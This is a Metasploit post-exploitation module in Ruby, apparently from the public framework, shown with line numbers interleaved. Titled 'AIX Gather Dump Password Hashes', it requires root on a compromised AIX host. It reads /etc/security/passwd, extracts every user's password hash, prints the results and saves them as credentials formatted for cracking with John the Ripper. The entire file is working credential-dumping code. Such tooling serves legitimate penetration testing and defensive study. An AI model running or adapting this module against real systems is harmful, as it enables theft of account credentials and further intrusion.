1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::Priv
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'AIX Gather Dump Password Hashes',
15
        'Description' => %q{Post module to dump the password hashes for all users on an AIX system.},
16
        'License' => MSF_LICENSE,
17
        'Author' => ['theLightCosine'],
18
        'Platform' => [ 'aix' ],
19
        'SessionTypes' => [ 'shell' ],
20
        'Notes' => {
21
          'Stability' => [CRASH_SAFE],
22
          'SideEffects' => [],
23
          'Reliability' => []
24
        },
25
        'References' => [
26
          [ 'ATT&CK', Mitre::Attack::Technique::T1003_008_ETC_PASSWD_AND_ETC_SHADOW ]
27
        ]
28
      )
29
    )
30
  end
31

32
  def run
33
    fail_with(Failure::NoAccess, 'You must run this module as root!') unless is_root?
34

35
    passwd_file = read_file('/etc/security/passwd')
36

37
    username = ''
38
    hash = ''
39

40
    passwd_file.each_line do |line|
41
      user_line = line.match(/(\w+):/)
42
      if user_line
43
        username = user_line[1]
44
      end
45

46
      hash_line = line.match(/password = (\w+)/)
47
      if hash_line
48
        hash = hash_line[1]
49
      end
50

51
      next unless hash.present?
52

53
      print_good("#{username}:#{hash}")
54
      credential_data = {
55
        jtr_format: 'des',
56
        origin_type: :session,
57
        post_reference_name: refname,
58
        private_type: :nonreplayable_hash,
59
        private_data: hash,
60
        session_id: session_db_id,
61
        username: username,
62
        workspace_id: myworkspace_id
63
      }
64
      create_credential(credential_data)
65
      username = ''
66
      hash = ''
67
    end
68
  end
69
end
70

71